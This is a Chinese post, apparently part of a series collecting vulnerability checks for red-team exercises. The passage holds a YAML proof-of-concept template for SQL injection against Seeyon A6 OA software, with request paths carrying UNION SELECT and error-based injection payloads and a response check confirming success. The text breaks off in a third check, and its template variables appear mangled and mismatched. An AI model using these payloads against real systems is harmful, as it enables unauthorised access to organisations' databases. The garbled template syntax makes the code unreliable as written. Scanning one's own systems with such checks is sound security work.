HW漏洞集合(三)-seeyon&yonyou-yaml版

HW漏洞集合(三)-seeyon&yonyou-yaml版

link:应用安全 - 工具 | 框架 - 致远OA - 漏洞汇总
主要是致远、用友

21. seeyon A6 sqli注入

补充说明：A6的注入点有很多，还是汇总到一个poc里面吧，感觉都是比较老的注入点了

name: poc-yaml-seeyon-A6-sqli
set:
  rand: randomInt(200000000, 210000000)
groups:
  poc1:
    - method: GET
      path: /HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=(0x7e,md5({
  {r1}})))%23
      follow_redirects: false
      expression: response.body.bcontains(bytes(md5(string(r1))))
  poc2:
    - method: GET
      path: /ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20UnIoN%20SeLeCt%201,2,md5({
  {r1}}),1%23
      follow_redirects: false
      expression: response.body.bcontains(bytes(md5(string(r1))))
  poc3:
    - method: GET
      path: /ext/trafaxserver/SendFax/resend.jsp